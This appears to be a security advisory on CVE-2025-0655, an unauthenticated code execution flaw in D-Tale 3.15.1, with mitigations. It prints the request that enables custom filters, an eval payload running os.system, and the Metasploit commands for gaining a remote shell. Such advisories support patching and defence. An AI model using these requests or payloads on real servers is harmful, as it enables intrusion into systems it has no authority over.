CVE-2025-0655 – Remote Code Execution in D-Tale via Unprotected Custom Filters

CVE-2025-0655 (now rejected as a duplicate of CVE-2024-55890) originally identified a critical remote code execution (RCE) vulnerability in the D-Tale data visualization tool, specifically affecting version 3.15.1. The flaw allowed unauthenticated attackers to execute arbitrary system commands by enabling a global setting and abusing an exposed API endpoint.

• CVE ID: CVE-2025-0655
• Severity: Critical
• CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
• EPSS Score: 85.91%
• Published: January 8, 2025
• Affected Versions: 3.15.1
• Patched Version: 3.16.1

The vulnerability lies in how D-Tale handles global configuration settings in its backend. Specifically, the enable_custom_filters flag—which is intended for controlled environments—can be toggled by an attacker via a specially crafted POST request to:

POST /dtale/global_state
{
  "enable_custom_filters": true
}

Once this flag is enabled, attackers can access the /dtale/test-filter endpoint, which processes user-supplied filter expressions. This endpoint evaluates Python expressions in an unsafe context, which attackers can manipulate to inject system-level commands.

Example payload to achieve command execution:

{
  "data": "__import__('os').system('id')"
}

• No authentication required (in vulnerable configurations)
• D-Tale server must be exposed to external access
• Version 3.15.1 specifically, where protections were not enforced
• enable_custom_filters not locked by server-side policy

While full source context is not public, the vulnerability involves dynamic evaluation of filter expressions:

def test_filter(expr):
    eval(expr)  # Dangerous use of eval()

This code gets exposed via an API route when enable_custom_filters is set to true.

1. Send Global State Toggle
   Enable enable_custom_filters via a POST request to /dtale/global_state.
2. Craft Payload
   Use the /dtale/test-filter endpoint to send a malicious payload with embedded system commands.
3. Achieve RCE
   The payload is evaluated, executing the supplied code in the context of the running server.

Metasploit includes a dedicated module to exploit this vulnerability:

msf > use exploit/linux/http/dtale_rce_cve_2025_0655
msf exploit(dtale_rce_cve_2025_0655) > show targets
    ...targets...
msf exploit(dtale_rce_cve_2025_0655) > set TARGET <target-id>
msf exploit(dtale_rce_cve_2025_0655) > show options
    ...configure RHOSTS, RPORT, etc...
msf exploit(dtale_rce_cve_2025_0655) > set RHOSTS <ip>
msf exploit(dtale_rce_cve_2025_0655) > set RPORT <port>
msf exploit(dtale_rce_cve_2025_0655) > run

Once successful, the attacker gains a remote shell with the privileges of the web server user.

• Upgrade: Update to D-Tale version 3.16.1 or newer where this vulnerability is patched.
• Restrict Network Exposure: Ensure D-Tale is only accessible on trusted internal networks.
• Sanitize Input: Avoid enabling dangerous settings like enable_custom_filters in production environments.
• Use WAF: Employ a Web Application Firewall to detect malicious API calls.

• NVD Advisory for CVE-2025-0655
• GitHub Advisory for CVE-2024-55890
• D-Tale GitHub Repo
• Patch Commit (v3.16.1)